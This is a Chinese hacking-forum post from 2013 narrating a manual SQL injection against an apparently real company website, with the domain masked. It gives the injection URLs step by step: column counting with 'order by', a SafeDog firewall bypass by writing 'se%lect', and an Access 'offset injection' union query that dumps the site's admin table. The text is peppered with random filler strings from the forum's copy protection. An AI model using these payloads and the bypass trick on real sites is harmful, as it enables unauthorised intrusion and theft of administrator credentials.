找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2175|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。2 J( m2 o3 u& D4 K- t
8 J% \% j8 K$ ~
- c8 Y4 C! F0 t! m) q! f; K
顺手加个admin, y: E. J* Y6 `$ C3 e

( i# F, b( d# L: p9 \
0 X0 Z( F$ g4 }默认后台。5 t* I$ T( q; e( R6 i! G
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​9 z& c8 ^. {+ r. P7 A6 \$ u$ x0 N; D( x
- w5 o. v8 F- Z7 a( w3 _* P% A

+ @, q7 Y2 z4 L8 [- g8 D# H1 w
所以就不用御剑扫了,待会直接封IP。' o! d1 y9 H3 D# u
( \( y" ~7 Z5 t% Y; r4 F
用order by语句判断是否存在注入。
0 o( k. s) |& u7 e' b* Fhttp://www.xxx.com /product_show.asp?id=997 order by 1+ L$ d4 p& L' w9 D
http://www.xxx.com /product_show.asp?id=997 order by 100: \) Q  Q8 K6 T5 f
现在存在注入,经测试后发现是9个字段。
- [6 h+ ~  ^8 F5 L& {) u8 s ' _* k5 \, g7 T  F5 h- w! U
接下来进行联合查询,猜是否存在admin表。9 D. c, D- ~  ]/ j* g- T. f+ V4 h
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​9 f( m) i* Y' R
* G- A$ I4 Y/ t

( ]' U' ~; s, t# ^
8 U7 E' K  g: _- `# l在select中间加个%,se%lect绕过安全狗。) i7 R" n' [$ W( S- K) f: Q! Y

8 T2 n8 ?- |, M( A. l$ b& E$ D
* Q7 \# g8 W1 i# d) \8 u发现存在admin表,然后开始手工猜常用的字段。
0 u9 J0 K8 b+ C% X0 L9 H5 |纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。, j( z# O$ F) O  E) b5 x# X4 e
8 }' Y2 S" A) |+ e
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
4 {6 }* N7 c2 X) s. z1 H
) s8 l, y( f9 J+ t8 C2 J5 r科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
+ s% Z4 Z/ i6 z+ W- rhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
3 v0 |9 C1 p# h0 F: L好了,敏感内容出显了。​! W& n( L2 g5 W  I: q* W% p

/ q6 r# c6 j* ^8 |8 p4 P
/ M! A' a  k. K$ L  H) S- k, M. l* o" k* Y9 c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表